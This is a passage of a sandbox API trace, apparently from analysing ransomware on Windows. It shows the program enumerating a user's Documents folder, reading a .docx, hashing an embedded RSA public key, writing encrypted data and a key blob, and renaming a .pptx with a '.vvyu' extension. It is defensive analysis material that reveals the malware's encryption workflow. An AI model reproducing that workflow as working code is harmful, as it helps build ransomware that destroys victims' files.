Flags=0x0, Size=0xc) returned 0x2c4e900 [0184.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0184.402] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e990 [0184.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0184.402] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0184.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.402] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e960 [0184.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0184.402] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e948 [0184.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0184.403] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e9a8 [0184.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e948 | out: hHeap=0x6a0000) returned 1 [0184.403] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e948 [0184.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e960 | out: hHeap=0x6a0000) returned 1 [0184.403] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0184.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0184.403] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0184.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0184.403] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0184.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e918 | out: hHeap=0x6a0000) returned 1 [0184.403] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e918 [0184.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0184.403] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0184.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e978 | out: hHeap=0x6a0000) returned 1 [0184.403] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0184.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9a8 | out: hHeap=0x6a0000) returned 1 [0184.403] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d41908 [0184.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.403] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0184.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0184.403] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0184.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e918 | out: hHeap=0x6a0000) returned 1 [0184.404] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d41b20 [0184.404] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0184.404] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0184.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0184.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0184.406] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0184.406] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0184.406] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0184.406] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41b20 | out: hHeap=0x6a0000) returned 1 [0184.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0184.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0184.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e948 | out: hHeap=0x6a0000) returned 1 [0184.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e990 | out: hHeap=0x6a0000) returned 1 [0184.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0184.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e930 | out: hHeap=0x6a0000) returned 1 [0184.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e900 | out: hHeap=0x6a0000) returned 1 [0184.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0184.408] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0184.408] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0184.408] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8e8 | out: hHeap=0x6a0000) returned 1 [0184.408] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31378 | out: hHeap=0x6a0000) returned 1 [0184.408] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0184.409] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0184.409] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0184.409] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0184.410] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0184.410] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0184.410] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0184.410] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0184.410] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0184.410] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0184.411] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0xe602, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0xe602, lpOverlapped=0x0) returned 1 [0184.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0184.412] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xe607, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.412] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0184.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0184.413] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6ff30 [0184.413] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d41908 [0184.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d41908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0184.413] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d41d38 [0184.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0184.413] WriteFile (in: hFile=0x584, lpBuffer=0x2d41d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d41d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0184.414] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41d38 | out: hHeap=0x6a0000) returned 1 [0184.414] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0184.414] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0184.414] CloseHandle (hObject=0x584) returned 1 [0184.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0184.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x880) returned 0x2d41908 [0184.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0184.416] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\-yzSadt_8t CRoYRKO.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\-yzsadt_8t croyrko.pptx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\-yzSadt_8t CRoYRKO.pptx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\-yzsadt_8t croyrko.pptx.vvyu")) returned 1 [0184.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.419] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0184.422] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76e020d0, ftCreationTime.dwHighDateTime=0x1d85844, ftLastAccessTime.dwLowDateTime=0xf4ab2ab0, ftLastAccessTime.dwHighDateTime=0x1d896cd, ftLastWriteTime.dwLowDateTime=0xf4ab2ab0, ftLastWriteTime.dwHighDateTime=0x1d896cd, nFileSizeHigh=0x0, nFileSizeLow=0x17c95, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1G5yOYkuiK.docx", cAlternateFileName="1G5YOY~1.DOC")) returned 1 [0184.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31378 [0184.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6ff30 [0184.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31378 | out: hHeap=0x6a0000) returned 1 [0184.422] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\1G5yOYkuiK.docx") returned=".docx" [0184.422] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\1G5yOYkuiK.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\1g5yoykuik.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0184.424] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=97429) returned 1 [0184.424] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0184.426] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x17c6f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.426] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0184.428] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0184.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.428] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.428] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x17c95, lpOverlapped=0x0) returned 1 [0184.429] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0184.429] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.429] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.429] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0184.431] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0184.431] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0184.431] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0184.431] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0184.431] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0184.431] GetLastError () returned 0x0 [0184.431] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0184.431] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0184.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0184.431] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0184.431] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0184.431] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.431] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0184.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.431] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0184.431] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x17ca0) returned 0x2d43778 [0184.432] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0184.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0184.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0184.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0184.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31378 [0184.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e8e8 [0184.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d313c0 [0184.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e900 [0184.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e930 [0184.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e990 [0184.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e948 [0184.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0184.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0184.433] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3b920 [0184.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d41908 [0184.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e930 | out: hHeap=0x6a0000) returned 1 [0184.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e948 | out: hHeap=0x6a0000) returned 1 [0184.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e990 | out: hHeap=0x6a0000) returned 1 [0184.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0184.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e990 [0184.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0184.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e948 [0184.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0184.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4e930 [0184.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0184.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0184.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0184.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0184.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0184.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0184.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0184.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0184.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0184.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e948 | out: hHeap=0x6a0000) returned 1 [0184.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e930 | out: hHeap=0x6a0000) returned 1 [0184.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0184.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0184.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e990 | out: hHeap=0x6a0000) returned 1 [0184.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0184.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0184.436] GetCurrentThreadId () returned 0x264 [0184.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0184.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d36a78 [0184.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0184.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0184.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0184.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0184.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0184.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0184.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.436] GetCurrentThreadId () returned 0x264 [0184.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0184.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0184.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0184.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0184.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0184.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0184.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0184.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0184.438] RtlAllocateHeap 